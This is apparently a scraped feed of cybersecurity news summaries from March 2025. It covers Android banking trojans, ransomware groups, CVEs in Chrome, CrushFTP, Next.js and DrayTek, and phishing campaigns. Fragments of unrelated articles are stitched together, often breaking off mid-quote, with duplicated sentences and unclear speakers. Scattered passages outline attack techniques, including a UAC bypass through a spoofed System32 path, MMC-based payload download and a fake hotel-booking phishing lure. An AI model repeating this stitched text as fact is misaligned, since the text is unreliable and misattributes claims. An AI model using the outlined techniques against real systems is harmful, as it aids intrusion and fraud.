Some of the important features supported by the malware are listed below - Launch specified application Self-remove from the device Post a push notification Send SMS messages to all/select contacts Retrieve contact lists Get a list of installed applications Get SMS messages Request Device Admin privileges Enable black overlay Update C2 server settings Enable/disable sound Enable/disable keylogging Make itself a default SMS manager "The emergence of the Crocodilus mobile banking Trojan marks a significant escalation in the sophistication and threat level posed by modern malware," ThreatFabric said. "Autosummary:
The worst-case individual loss described in the complaint was that of a victim from Mentor, Ohio, who lost approximately $663,352 in total ($250,000 in initial investment, $174,400 in "release fees," $238,946 in "handling fees"). "Autosummary:
RAT Capabilities: Screen Interaction & Control: Performs swipes, clicks, and button presses (Back, Home, Menu). “Crocodilus enters the scene not as a simple clone, but as a fully-fledged threat from the outset, equipped with modern techniques such as remote control, black screen overlays, and advanced data harvesting via accessibility logging.” "Autosummary:
"The rise of mobile banking has changed how businesses and customers interact. It brought about increased convenience and efficiency, but has also opened new doors for cybercriminals, particularly on the Android platform, which dominates the global smartphone market. According to ESET research, Android financial threats, targeting banking apps and cryptocurrency wallets, grew by 20% in H2 of 2024 compared to the first half of the year. Fortunately, large financial institutions like banks have significant resources, … More
The post Android financial threats: What businesses need to know to protect themselves and their customers appeared first on Help Net Security.
"Autosummary:
This approach combines something the user knows (e.g., a password), something they have (e.g., a smartphone or security token), and something they are (e.g., biometric data such as fingerprints or facial recognition).This approach combines something the user knows (e.g., a password), something they have (e.g., a smartphone or security token), and something they are (e.g., biometric data such as fingerprints or facial recognition). Once installed, these apps function as fake banking interfaces, obtaining sensitive data, by phishing or other means, and transmit it to attackers.User-friendly security measures, such as biometric authentication or password managers, should be intuitive and easy to use, encouraging businesses and their employees to adopt and maintain these practices long-term. "Global cybersecurity spending is expected to grow by 12.2% in 2025, according to the latest forecast from the IDC Worldwide Security Spending Guide. The rise in cyber threats is pushing organizations to invest more in their defenses. AI tools are making these threats more sophisticated, which is adding to the urgency. IDC says this steady climb in spending will continue through 2028, hitting $377 billion by then. The U.S. and Western Europe will still make … More
The post Cybersecurity spending set to jump 12.2% in 2025 appeared first on Help Net Security.
"Autosummary:
Banking, federal/central government, telecommunications, capital markets, and healthcare provider will be the industries spending the most at the global level on security in 2025, while the fastest-growing will be capital markets, media and entertainment, and life sciences with an expected year-on-year growth rate of 19.4%, 17.1%, and 16.9%, respectively in 2025. "89% of healthcare organizations have the top 1% of riskiest Internet of Medical Things (IoMT) devices – which contain known exploitable vulnerabilities (KEVs) linked to active ransomware campaigns as well as an insecure connection to the internet – on their networks, according to Claroty. These figures represent a highly targeted, critical area where most security teams should prioritize their remediation efforts. The report is based on an analysis of over 2.25 million IoMT and 647,000 … More
The post Healthcare’s alarming cybersecurity reality appeared first on Help Net Security.
"Autosummary:
8% of imaging systems (X-rays, CT scans, MRI, ultrasound, and more) have KEVs linked to ransomware and insecure internet connectivity—making this the riskiest medical device category—impacting 85% of organizations. 20% of hospital information systems (HIS), which manage clinical patient data, as well as administrative and financial information, have KEVs linked to ransomware and insecure internet connectivity, impacting 58% of organizations. "Autosummary:
"Autosummary:
Additional recovery options: Datto BCDR provides granular and full-system recovery capabilities, including file and folder restore, volume restore, virtualization via hypervisor, bare metal restore and ESX upload. Lightning-fast recovery with Datto"s 1-Click Disaster Recovery Datto"s groundbreaking 1-Click Disaster Recovery (1-Click DR) feature makes disaster recovery fast, effortless and reliable — as simple as reordering from your favorite fast-food app. Export backup images, including in RAW format: The Export Image function supports export to VMDK, VHD and VHDX formats and offers native RAW export for Linux-based hypervisors, including Proxmox, SCALE Computing Platform and OpenStack. Seamless local recovery for instant failover Get powerful features for swift local recovery, including: Local virtualization: Datto appliances double as local recovery targets, allowing businesses to host workloads and applications directly on the device. Experience the power of the immutable Datto Cloud The Datto Cloud is purpose-built for cloud backup and DR, offering unmatched flexibility, security, performance and cost-efficiency. Effortless cloud recovery with the Datto Recovery Launchpad What sets Datto apart is its purpose-built disaster recovery cloud, designed for fast, reliable and hassle-free recovery. "Autosummary:
"The apps have a basic chat functionality built-in, allowing users to register, login, and chat with other users (so, theoretically, infected users could have messaged each other, if they knew each others" user IDs)," Kohli said. "Autosummary:
Mozilla fixed critical Firefox vulnerability CVE-2025-2857 Pierluigi Paganini March 28, 2025 March 28, 2025 Mozilla addressed a critical vulnerability, tracked as CVE-2025-2857, impacting its Firefox browser for Windows. "Autosummary:
Qualys provides technical details for the three bypass methods, which are summarized as follows: Bypass via aa-exec: Users can exploit the aa-exec tool, which allows running programs under specific AppArmor profiles. "Autosummary:
CIS member countries are all allied with Russia, and include a number of former Soviet republics: Armenia Azerbaijan Belarus Kazakhstan Kyrgyzstan Moldova Russia Tajikistan Uzbekistan Why would the VanHelsing affiliates banned from attacking these countries? VanHelsing is unusual in targeting a variety of platforms - including Windows, Linux BSD, ARM, and VNWare ESXi - seemingly in an attempt to broaden its capacity to extort a ransom from impacted organisations. First reported earlier in March 2025, VanHelsing is a new ransomware-as-a-service operation. "Autosummary:
"This was not a breach of our systems, but rather a case of these parties obtaining user names and passwords from phishing campaigns, planting malware or breaches at other companies," a Sam"s Club spokesperson told BleepingComputer at the time. "Autosummary:
The operation can impersonate more than 114 email and service providers, including Gmail, Outlook, Yahoo, DHL, Maersk, and RakBank, delivering messages with subject lines crafted to prompt urgent action like “Action Required: Account Deactivation.” "Autosummary:
Chrome up to date The vulnerability exists in Windows for all Chromium based browsers, including Edge, Brave, Vivaldi, and Opera. "Autosummary:
Android banking trojan Pierluigi Paganini March 28, 2025 March 28, 2025 Russian authorities arrested three suspects for developing Mamont, a newly identified Android banking trojan. "Autosummary:
Grandoreiro is a modular backdoor that supports the following capabilities: Keylogging Auto-Updation for newer versions and modules Web-Injects and restricting access to specific websites Command execution Manipulating windows Guiding the victim’s browser to a certain URL C2 Domain Generation via DGA (Domain Generation Algorithm) "Autosummary:
"Autosummary:
Last year, the regulator criticised Advanced over the incident, which placed "further strain" on a "sector already under pressure". "This month’s roundup features exceptional open-source cybersecurity tools that are gaining attention for strengthening security across various environments. Hetty: Open-source HTTP toolkit for security research Hetty is an open-source HTTP toolkit designed for security research, offering a free alternative to commercial tools like Burp Suite Pro. Fix Inventory: Open-source cloud asset inventory tool Fix Inventory is an open-source tool for detecting compliance and security risks in cloud infrastructure accounts. Commix: Open-source OS command injection exploitation … More
The post Hottest cybersecurity open-source tools of the month: March 2025 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The threat intelligence firm said it has seen observed in-the-wild activity against the below CVE identifiers - CVE-2020-8515 (CVSS score: 9.8) — An operating system command injection vulnerability in multiple DrayTek router models that could allow remote code execution as root via shell metacharacters to the cgi-bin/mainfunction.cgi URI CVE-2021-20123 (CVSS score: 7.5) — A local file inclusion vulnerability in DrayTek VigorConnect that could allow an unauthenticated attacker to download arbitrary files from the underlying operating system with root privileges via the DownloadFileServlet endpoint CVE-2021-20124 (CVSS score: 7.5) — A local file inclusion vulnerability in DrayTek VigorConnect that could allow an unauthenticated attacker to download arbitrary files from the underlying operating system with root privileges via the WebServlet endpoint Indonesia, Hong Kong, and the United States have emerged as the top destination countries of the attack traffic for CVE-2020-8515, while Lithuania, the United States, and Singapore have been singled out as part of attacks exploiting CVE-2021-20123 and CVE-2021-20124. "Autosummary:
Hosts: Graham Cluley: @grahamcluley.com @[email protected] Carole Theriault: @caroletheriault Episode links: Sponsored by: Vanta – Expand the scope of your security program with market-leading compliance automation… while saving time and money. "CrushFTP has fixed a critical vulnerability (CVE-2025-2825) in its enterprise file transfer solution that could be exploited by remote, unauthenticated attackers to access vulnerable internet-facing servers (and likely the data stored on them). Attackers, especially ransomware gangs, have a penchant for leveraging 0-day and n-day vulnerabilities in MOVEit Transfer, Cleo, Citrix ShareFile, and other enterprise-grade file transfer and sharing solutions. Attackers have been known to exploit previous CrushFTP vulnerabilities, but there is currently no evidence … More
The post CrushFTP: Patch critical vulnerability ASAP! (CVE-2025-2825) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
These documents might include: Links to fake Microsoft 365 login pages Phishing portals that mimic company tools or services Redirect chains that eventually land on credential-harvesting sites In this ANY.RUN malware analysis session, an Excel file contains malicious phishing link: View analysis session with Excel file Excel file containing malicious link detected inside ANY.RUN sandbox When clicked, the victim is taken to a webpage that shows a Cloudflare "Verify you"re a human" check. With ANY.RUN"s new Android OS support, your security team can now: Analyze Android malware in a real mobile environment Investigate suspicious APK behavior before it hits production devices Respond to mobile threats faster and with more clarity Support incident response across both desktop and mobile ecosystems It"s a big step toward complete coverage and it"s available on all plans, including free. View analysis session with malicious payload Phishing email containing malicious Excel attachment In the MITRE ATT&CK section of this analysis, we can see how ANY.RUN sandbox detected this specific technique used in the attack: Exploitation of Equation Editor detected by ANY.RUN Although Microsoft patched the vulnerability years ago, it"s still useful for attackers targeting systems that haven"t been updated. "Autosummary:
Pierluigi Paganini March 27, 2025 March 27, 2025 Arkana Security, a new ransomware group, claims to have breached the telecommunications provider WideOpenWest (WOW!). Arkana claimed to have breached WOW!’s internal systems, including AppianCloud and Symphonica platforms “A major cyber attack reaps Wide Open West (WOW!), a leading Internet Service Provider with over 1.5 million customers. "Autosummary:
" "When the primary control decreases the load at its maximum capacity, the attack will reduce all its load immediately, forcing the primary control to raise the load in the system followed by an immediate increase of the load by the attack" - Forescout Vedere Labs Apart from disrupting a power grid, the disclosed vulnerabilities can also be exploited in scenarios that impact user privacy, hijacking smart devices in the house that may be controlled through the vendor"s cloud platform, or even ransomware attacks by holding the devices hostage until a ransom is paid. "In this Help Net Security interview, Kim Crawley, cybersecurity expert and Professor at the Open Institute of Technology, discusses her latest book, The Ultimate Cybersecurity Careers Guide. She shares insights on how aspiring professionals can break into the field and explores the importance of continuous learning. What makes this guide different from other available cybersecurity career resources? That’s an excellent question. The vast majority of books on cybersecurity certifications are guides to one particular certification … More
The post A closer look at The Ultimate Cybersecurity Careers Guide appeared first on Help Net Security.
"Autosummary:
Each of the big vendor neutrals (i.e., CompTIA, ISC2, etc.) has a chapter, and each of the big vendor specifics (i.e., Microsoft, AWS, etc.) has a chapter too.In this Help Net Security interview, Kim Crawley, cybersecurity expert and Professor at the Open Institute of Technology, discusses her latest book, The Ultimate Cybersecurity Careers Guide.I cowrote The Pentester Blueprint, I wrote a detailed manual on cloud “pentesting” (actually, it’s vuln scanning), I worked for Hack The Box, I did a SANS talk on pentesting reports.I personally have had CompTIA A+, Network+, Security+, and ISC2 CISSP, but that’s it. There are a handful of great cybersecurity career advice YouTubers, subreddits, social media accounts, and so on.I explain most of the common cybersecurity roles in detail, the upsides and downsides of each of them, which certs may be relevant, and how to network to get those jobs.Employers should only ask for CISSPs for roles that require a lot of previous industry experience, in SecOps, security architecture, or security leadership.But, if for example, someone gets an $800 bug bounty reward here or there, that can lead to application security and application pentesting jobs that do provide a full time income.While my readers work on becoming employable humans, I urge you to bypass GenAI in search engines, do your own thinking, and come up with your own ideas when you’re doing any sort of creative or cognitive work. "Autosummary:
"ClickFix is increasingly being exploited by cybercriminals, scammers, and APT groups, as reported by other researchers observing its use in the wild," CYFIRMA said. "Autosummary:
In January, Italy’s Data Protection Authority Garante asked the AI firm DeepSeek to clarify its data collection, sources, purposes, legal basis, and storage, citing potential risks to user data. "Autosummary:
"Autosummary:
The operations these plugins support include: Shell access File system manipulation Keylogging Proxying Screenshot capturing File transfer Process listing/killing The ShadowPad connection Another interesting finding in ESET"s report is FamousSparrow"s use of ShadowPad, a versatile modular remote access trojan (RAT) associated with several Chinese APTs. "Autosummary:
"Autosummary:
U.S. CISA adds Google Chromium Mojo flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini March 27, 2025 March 27, 2025 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Google Chromium Mojo flaw to its Known Exploited Vulnerabilities catalog. "Autosummary:
While it tagged CVE-2025-2783 as exploited in attacks, Google has yet to share further details regarding these incidents and said that "access to bug details and links may be kept restricted until a majority of users are updated with a fix." However, Kaspersky researchers who discovered the actively exploited zero-day also published a report with additional details, saying that attackers use CVE-2025-2783 exploits to bypass Chrome sandbox protections and infect targets with sophisticated malware. "Autosummary:
The Russian cybersecurity vendor, in its own bulletin, characterized the zero-day exploitation of CVE-2025-2783 as a technically sophisticated targeted attack, indicative of an advanced persistent threat (APT). "Google is in the process of rolling out Chrome v134.0.6998.178 to Windows users to fix CVE-2025-2783, a zero-day vulnerability that allowed attackers to to bypass Chrome sandbox protections. The vulnerability was flagged by Kaspersky researchers, who discovered it being exploited by a suspected state-sponsored APT group to target media outlets and educational institutions in Russia. About CVE-2025-2783 Google explains the source of the flaw thus: “Incorrect handle provided in unspecified circumstances in Mojo on Windows.” … More
The post Google fixes exploited Chrome sandbox bypass zero-day (CVE-2025-2783) appeared first on Help Net Security.
"Autosummary:
Researchers Igor Kuznetsov and Boris Larin say that the cause of CVE-2025-2783 was “a logical error at the intersection of Google Chrome’s sandbox and the Windows operating system,” and that it initially left them scratching their heads: “Without doing anything obviously malicious or forbidden, it allowed the attackers to bypass Google Chrome’s sandbox protection as if it didn’t even exist.” "Autosummary:
PAM solutions streamline compliance by providing detailed logs of privileged account activities, simplifying the auditing process, and ensuring adherence to standards, laws, and regulations such as the GDPR, PCI DSS, and NIS2.PAM solutions streamline compliance by providing detailed logs of privileged account activities, simplifying the auditing process, and ensuring adherence to standards, laws, and regulations such as the GDPR, PCI DSS, and NIS2.This efficiency leads to increased productivity, as users can access necessary systems promptly without compromising security. Overall, implementing a robust PAM solution not only fortifies your organization"s security against insider threats but also delivers a multitude of benefits that drive operational efficiency, regulatory compliance, and productivity growth.Automating insider threat response With the automation provided by PAM solutions, organizations significantly reduce the time to detect and respond to insider threats, minimizing potential financial, operational, and reputational damage. The consequences of insider threats range from financial losses and reputational damage to severe penalties for non-compliance with critical cybersecurity laws, regulations, and standards like GDPR, NIS2, or HIPAA. "Autosummary:
"Autosummary:
While most ransomware operations focus on targeting VMware ESXi servers, RedCurl"s new "QWCrypt" ransomware specifically targets virtual machines hosted on Hyper-V. QWCrypt attacks The attacks observed by Bitdefender start with phishing emails with ".IMG" attachments disguised as CVs. "Autosummary:
Please find the details below: Reservation number: 5124588434141 Guest Name: Margit Kainz Check-in Date: 2025-03-25 Check-out Date: 2025-04-01 Room Type: Deluxe Double Room Guests: 2 Adults Special Requests:Early check-in requested (before 2 PM) Payment Status: Payment at property {link to landing page} (Copy and paste this link in your browser to confirm booking) "Autosummary:
Here’s the fake ad: If you put it side by side with the real DeepSeek ads, the difference is relatively easy to spot: But as an unsuspecting searcher, you aren’t likely to make that comparison, and as you may know from previous posts about fake Google sponsored ads, the criminals behind these campaigns can be a lot more convincing. "Security consultant Troy Hunt, the creator of the Have I Been Pwned (HIBP) service, has revealed that he got tricked by a clever phishing email, and that the attacker gained access to his Mailchimp account and stole a list of email addresses of his newsletter subscribers. Commendably, he added the compromised data – email and IP addresses, rough geolocation data – to HIBP, so that users may check whether theirs is included or get notified … More
The post If you think you’re immune to phishing attempts, you’re wrong! appeared first on Help Net Security.
"Autosummary:
The email does not address the recipient by name and the email address from which it was sent does not look like it might belong to Mailchimp (hr@group-f.be) but, as he explained: He was jet-lagged and tired Outlook on iOS, which he initially used to read the email, did not render the email address, just the spoofed sender name (“MailChimp Account Services”) "DeNexus announced an innovative enhancement to its cyber risk management flagship solution DeRISK. The new DeRISK Quantified Vulnerability Management leverages advanced AI techniques to automatically and continuously mapping common vulnerabilities and exposures, or CVEs, to potential financial impacts, providing insights for cybersecurity teams. This new solution will revolutionize vulnerability management in OT environments by addressing the overwhelming challenge of prioritizing CVEs, reducing the task to only those that drive financial exposure, and transforming how organizations … More
The post DeRISK Quantified Vulnerability Management evaluates cyber risks using business-level metrics appeared first on Help Net Security.
"Autosummary:
“In addition to layering in exploit metrics like EPSS and KEV, we must understand the context and exposure of identified vulnerabilities—using DeRISK’s wealth of outside-in and inside-out data, we can now prioritize remediation at scale, while also having financial data to support risk-acceptance decisions.” "Autosummary:
files - Using the ExecuteShellCommand method of MMC to download and execute a next-stage payload on the victim"s machine, an approach previously documented by Dutch cybersecurity company Outflank in August 2024 Using mock trusted directories such as "C:\Windows \System32" (note the space after Windows) to bypass User Account Control (UAC) and drop a malicious .msc file called "WmiMgmt.msc" Trend Micro said the attack chains likely begin with victims downloading digitally-signed Microsoft installer (MSI) files impersonating legitimate Chinese software like DingTalk or QQTalk, which is then used to fetch and execute the loader from a remote server. "Autosummary:
RedCurl, also called Earth Kapre and Red Wolf, has a history of orchestrating corporate espionage attacks aimed at various entities in Canada, Germany, Norway, Russia, Slovenia, Ukraine, the United Kingdom, and the United States. "Autosummary:
The impacted organizations were based in Argentina, Aruba, Brazil, Canada, Congo, Croatia, Peru, France, Italy, Spain, the Netherlands, the United States, the United Kingdom, and the UAE. "Autosummary:
"Autosummary:
"I attempted to verify the legitimacy of the data breach by requesting my own personal details from orders placed in 2021 or 2022," explained Bussey on X. "Seconds later, they provided that information, including my name, address, postal code, phone number, and email. "Autosummary:
"Autosummary:
The stolen records included email addresses, subscription statuses, and IP addresses, along with latitude and longitude data, which, as Hunt later learned, “do not pinpoint the location of the subscriber.” And, importantly, as the owner of the website Have I Been Pwned (HIBP), which helps people search whether they’ve been involved in a data breach, Hunt had one more data breach to add to the website’s collection: His own. "Autosummary:
New ReaderUpdate malware variants target macOS users Pierluigi Paganini March 26, 2025 March 26, 2025 New ReaderUpdate malware variants, now written in Crystal, Nim, Rust, and Go, targets macOS users, SentinelOne warns. "Spring cleaning isn’t just for your closets; security teams should take the same approach to their security operations data, where years of unchecked log growth have created a bloated, inefficient and costly mess. The modern Security Operations Center (SOC) is drowning in security telemetry from endpoints, cloud, SaaS applications, identity platforms and a growing list of other sources. In practice, most of these are redundant, irrelevant, or just outright noise, and are affecting detection effectiveness, … More
The post Spring clean your security data: The case for cybersecurity data hygiene appeared first on Help Net Security.
"Autosummary:
Instead, security teams should focus on curation, contextualization, and value efficiency and forward only what matters when it matters, enriching it effectively, and storing everything where it makes the most sense.In practice, most of these are redundant, irrelevant, or just outright noise, and are affecting detection effectiveness, operational efficiency, and the ability to extract real insights.Stop DIYing security data management For years, security teams had little choice but to repurpose log management tools, custom scripts, and DIY approaches to make sense of security telemetry.Instead, lean-forward teams should be leveraging a variety of techniques – including machine learning, vector analysis, knowledge graphs and LLMs – to automate event transformation, refinement, and prioritization. "Analyst – Cyber Threat Intelligence Adecco | UAE | On-site – View job details As an Analyst – Cyber Threat Intelligence, you will conduct threat hunting missions across multi-cloud environments and perform cyber forensics to analyze security incidents. You will also engage in offensive security assessments, participate in red teaming, and support incident response efforts to mitigate breaches. Application and Product Security Senior Analyst (Penetration Testing) Vertiv | USA | On-site – View job details … More
The post Cybersecurity jobs available right now: March 25, 2025 appeared first on Help Net Security.
"Autosummary:
Information Security Engineer II (Network Security) First Citizens | India | On-site – View job details As an Information Security Engineer II (Network Security), you will be responsible for analyzing, designing, installing, configuring, maintaining, and repairing of network security infrastructure and application components. Network & Cloud Security Specialist Sagen | Canada | Hybrid – View job details As a Network & Cloud Security Specialist, you will execute the deployment of security controls for Sagen’s networks and network access including all associated VPN, firewalls, intrusion detection and prevention systems, web application firewalls, and cloud access controls. Senior Security Consultant – Offensive Security Stratascale | USA | Remote – View job details As a Senior Security Consultant – Offensive Security, you will perform penetration testing against complex environments covering both external, internal, web application, and other forms of offensive security engagements. Cyber Security Architect Varonis | Israel | Hybrid – View job details As a Cyber Security Architect, you will be responsible for designing, developing, and implementing security solutions to protect Varonis’ infrastructure, applications, and data from cyber threats. "Autosummary:
私密相册 (pBOnCi.cUVNXz) X•GDN (pgkhe9.ckJo4P) 迷城 (pCDhCg.cEOngl) 小宇宙 (p9Z2Ej.cplkQv) X (pDxAtR.c9C6j7) 迷城 (pg92Li.cdbrQ7) 依恋 (pZQA70.cFzO30) 慢夜 (pAQPSN.CcF9N3) indus credit card (indus.credit.card) Indusind Card (com.rewardz.card) There is no evidence that these apps are distributed to Google Play. "Autosummary:
Astral Foods, South Africa’s largest poultry producer, lost over $1M due to a cyberattack Pierluigi Paganini March 25, 2025 March 25, 2025 Astral Foods, South Africa’s largest poultry producer, lost over $1M due to a cyberattack disrupting deliveries and impacting operations. "Autosummary:
A cyberattack hits Ukraine’s national railway operator Ukrzaliznytsia Pierluigi Paganini March 25, 2025 March 25, 2025 A cyberattack on Ukraine’s national railway operator Ukrzaliznytsia disrupted online ticket services, causing long lines at Kyiv’s station. "Autosummary:
According to Trend Micro, Salt Typhoon targeted telecom, government, technology, consulting, chemical and transportation companies in Afghanistan, Brazil, Eswatini, India, Indonesia, Malaysia, Pakistan, the Philippines, South Africa, Taiwan, Thailand, U.S. and Vietnam. Middle East-related activity CISA alert on Iranian cyber actors The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Communications Security Establishment Canada (CSE), Australian Federal Police (AFP) and Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) released a joint cybersecurity advisory regarding Iranian cyber actors that have been actively targeting organizations across various critical infrastructure sectors, including healthcare, public health, government, IT, engineering and energy, since October 2023.In total, eight modules were discovered, with targets from Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey and the United Arab Emirates.Interlock ransomware samples have been spotted in India, Italy, Japan, Germany, Peru, South Korea, Turkey and the U.S., and victims have been found in the education, finance, government, healthcare, and manufacturing sectors.Additionally, the attackers exploited the following vulnerabilities: Atlassian Confluence RCE vulnerabilities (CVE-2023-22515, CVE-2023-22518), Zimbra vulnerability chain (CVE-2019-9670, CVE-2019-9621), MS Exchange vulnerability chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and JetBrains TeamCity RCE vulnerability (CVE-2024-27198). Attacks by Akira/Howling Scorpius targeting medium-size organizations in various sectors, including construction, transportation and logistics, government, telecommunications, technology and pharmaceuticals, bypassed cybersecurity solutions through a mix of well-known techniques, such as Bring You Own Vulnerable Driver, and a new one targeting virtualized infrastructures protected with EDR solutions.The new Interlock ransomware, which has a version tailored for this OS, has been observed targeting industrial enterprises in India, Italy, Japan, Germany, Peru, South Korea, Turkey, and the United States.Initial access is achieved by exploiting vulnerable public endpoints using CVE-2023-46805, CVE-2024-21887 (Ivanti Connect VPN service), CVE-2023-48788 (FortiClient EMS), CVE-2022-3236 (Sophos firewall), CVE-2021-26855, CVE-2021-26857-6858 and CVE-2021-27065 (ProxyLogon). The attacks associated with all four group names (Shadow, Twelve, Comet, DARKSTAR) involved use of the same tools, like Cobint, gpo.ps1, similar strings in Windows tasks created for running malware, and ngrok as one of the backup channels for the access and execution of other malicious actions. Operation Cobalt Whisper SEQRITE Labs’ APT team has revealed an advanced cyber-espionage campaign known as Operation Cobalt Whisper, impacting multiple industries including defense, education, environmental engineering, electrotechnical engineering, energy, cybersecurity, aviation and healthcare in Hong Kong and Pakistan.In addition to GHOSTSPIDER, Salt Typhoon uses a set of proprietary and shared tools for complex multi-stage attacks: SNAPPYBEE (aka Deed RAT), SparrowDoor, CrowDoor and MASOL RAT for Linux, the DEMODEX rootkit, NeoReGeorg, frpc, and Cobalt Strike. According to Kaspersky telemetry, the threat actor has been active in Russia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Slovakia, and Turkey. When targeting defence, energy, governmental, pharmaceutical, insurance and legal sectors in Europe, Ukraine and the U.S. for espionage and cybercrime, RomCom exploited a chain of two zero-day vulnerabilities (one in the browser and one in the OS) that ended up with zero-click remote code execution.Affected industries include education, construction, consulting, transportation and logistics, government, telecommunications, technology and pharmaceuticals, with manufacturing being affected the most. RomCom attacks ESET researchers have linked Russia-aligned threat actor RomCom (aka Storm-0978, Tropical Scorpius, UNC2596), known for its opportunistic and targeted espionage operations, to a campaign exploiting two zero-day vulnerabilities: one in Mozilla Firefox (CVE-2024-9680) and the other in Microsoft Windows (CVE-2024-49039).The malware supports several plugins that can steal login and FTP credentials, email addresses, cookies, and other information from browsers, Outlook, Thunderbird, FileZilla and WinSCP.The Crypt Ghouls’ other toolset consists of common tools such as Mimikatz, XenAllPasswordPro, PingCastle, Localtonet tool, Resocks, AnyDesk, PsExec and others. "Autosummary:
" Fake X apps steal data McAfee discovered several APKs in its report as part of the campaigns using the .NET MAUI technique, including fake banking, communication, dating, and social media apps such as X. Fake X app Source: McAfee The researchers used two apps as examples, IndusInd and SNS, which are distributed outside Google Play, Android"s official app store. "By now, it’s no secret—cyber threats are on the rise, and the need for strong cybersecurity is greater than ever. Globally small and medium-sized businesses (SMBs) are prime targets for cyberattacks, yet many can’t afford a full-time Chief Information Security Officer (CISO). That’s where the virtual CISO (vCISO) model comes in, offering a cost-effective way for SMBs to get expert security leadership in using a flexible model and without the big price tag. For MSPs … More
The post The vCISO Academy: Transforming MSPs and MSSPs into cybersecurity powerhouses appeared first on Help Net Security.
"Autosummary:
Some key highlights of the academy include: Expert guidance from industry experts who share their practical knowledge and experience on a wide range of essential vCISO functions, including risk and compliance assessments, cybersecurity strategy development, and effective communication of risks to executive teams. Empowering MSPs and MSSPs to accelerate their vCISO journey By bridging the knowledge gap and offering structured, accessible learning, the vCISO Academy empowers service providers to: Broaden their perspective: The vCISO Academy provides a deeper understanding of what it means to be a vCISO with specialized training to address the cybersecurity shortage. "Autosummary:
" Coinciding with the MSS statement, Chinese cybersecurity firms QiAnXin and Antiy have detailed spear-phishing attacks orchestrated by a Taiwanese threat actor codenamed APT-Q-20 (aka APT-C-01, GreenSpot, Poison Cloud Vine, and White Dolphin) that lead to the delivery of a C++ trojan and command-and-control (C2) frameworks like Cobalt Strike and Sliver. "Autosummary:
"Autosummary:
In recent months, 0patch has reported three other zero-day vulnerabilities that Microsoft patched or has yet to address, including a Windows Theme bug (patched as CVE-2025-21308), a Mark of the Web bypass on Server 2012 (still a zero-day without an official patch), and an URL File NTLM Hash Disclosure Vulnerability (patched as CVE-2025-21377). "Autosummary:
"Microsoft is rolling out a new generation of AI agents in Security Copilot, built to help with some of the most time-consuming security challenges, such as phishing, data protection, and identity management. Phishing is still one of the most common — and costly — types of cyberattacks out there. Last year, from January to December 2024, Microsoft spotted over 30 billion phishing emails aimed at customers. The sheer volume is staggering, and it’s more than … More
The post Microsoft’s new AI agents take on phishing, patching, alert fatigue appeared first on Help Net Security.
"Autosummary:
“Purpose-built for security, agents learn from feedback, adapt to workflows, and operate securely—aligned to Microsoft’s Zero Trust framework,” said Vasu Jakkal, Corporate VP, Microsoft Security. "Autosummary:
Stoli Group Manufacturing, food and beverage | Denial of operations, denial of IT services, data leakage, bankruptcy | Ransomware Stoli Group USA and Kentucky Owl, U.S.-based subsidiaries of the Luxembourg-based vodka manufacturer Stoli Group, filed for Chapter 11 bankruptcy on November 29, months after a ransomware attack disrupted their operations. Medion Manufacturing, electronics | Denial of operations, denial of IT systems, data leakage | Ransomware German electronic products supplier Medion AG, a subsidiary of Lenovo, a Chinese multinational technology company, became the target of a cyberattack.Countries with the highest number of reported incidents: USA: 81% (87 incidents) Germany: 6% (7 incidents) Japan: 4% (4 incidents) This quarter, we saw incidents in certain countries where we rarely see public confirmation of incidents: Costa Rica, Luxembourg, Latvia, Burkina Faso, and Pakistan. Other major incidents of interest Microlise Transportation, logistics| Denial of IT systems, denial of services | Ransomware Microlise, a British telematics and fleet management solution provider, was affected by the cyberattack known to have disrupted DHL’s store deliveries for the retailer NISA. Biggest impact prevented by responders TetraSoft Energy, mining | Denial of operations and services, supply chain / trusted partner A targeted cyberattack on TetraSoft, a Russian company that provides remote monitoring of hydrocarbon production and drilling, was detected and stopped.According to the company, the threat actors stole a total of 50,694 files from NPCV, including internal documents related to green procurement, health and safety, policies, and transactions, as well as emails from business partners.According to Financial Times, Serco, which handles the transport of prisoners for the Ministry of Justice, has seen vehicle tracking, panic alarms, navigation, and notifications related to estimated arrival times disabled. Incidents at large organizations Schneider Electric Energy, manufacturing | Personal data leakage | Ransomware On November 4, French energy management and automation solutions company Schneider Electric confirmed a cyberattack involving unauthorized access to one of its internal project execution tracking platforms hosted in an isolated environment following claims by the Grep (Hellcat) group of an incident involving the theft of 40 GB and a ransom demand. "Autosummary:
Found being sold on the dark web, the data reportedly included “profile and account ID numbers, names, gender, birth year, maternal and paternal genetic markers, ancestral heritage results, and data on whether or not each user has opted into 23AndMe’s health data.”According to the company’s own privacy statement: “If we are involved in a bankruptcy, merger, acquisition, reorganization, or sale of assets, your Personal Information may be accessed, sold or transferred as part of that transaction.” "Autosummary:
Finally, in the third stage, the decrypted file contains code related to the .NET MAUI framework, which is then loaded to execute the main payload.” continues the report.MAUI-based malware to evade detection through techniques like hidden code blobs, multi-stage loading, encryption, and obfuscation. "Autosummary:
"Autosummary:
"Autosummary:
FBI warns of malicious free online document converters spreading malware Pierluigi Paganini March 24, 2025 March 24, 2025 The FBI warns of a significant increase in scams involving free online document converters to infect users with malware. "Autosummary:
The group has extended its operations to countries in Asia and targets various sectors, including healthcare, real estate, construction, IT, food, and manufacturing.” "A critical vulnerability (CVE-2025-29927) in the open source Next.js framework can be exploited by attackers to bypass authorization checks and gain unauthorized access to web pages they should no have access to (e.g., the web app’s admin panel). Vercel – the Cloud platform-as-a-Service company that develops the popular framework – has released security updates fixing it, and has advised users to upgrade as soon as possible. What is Next.js and how does CVE-2025-29927 manifest? Next.js … More
The post Critical Next.js auth bypass vulnerability opens web apps to compromise (CVE-2025-29927) appeared first on Help Net Security.
"Autosummary:
Next.js uses its own middleware to processes requests, protect routes, add security headers to responses, and handle things like user authentication and user redirection (e.g., based on geolocation, their session / authorization cookies, etc.). "Autosummary:
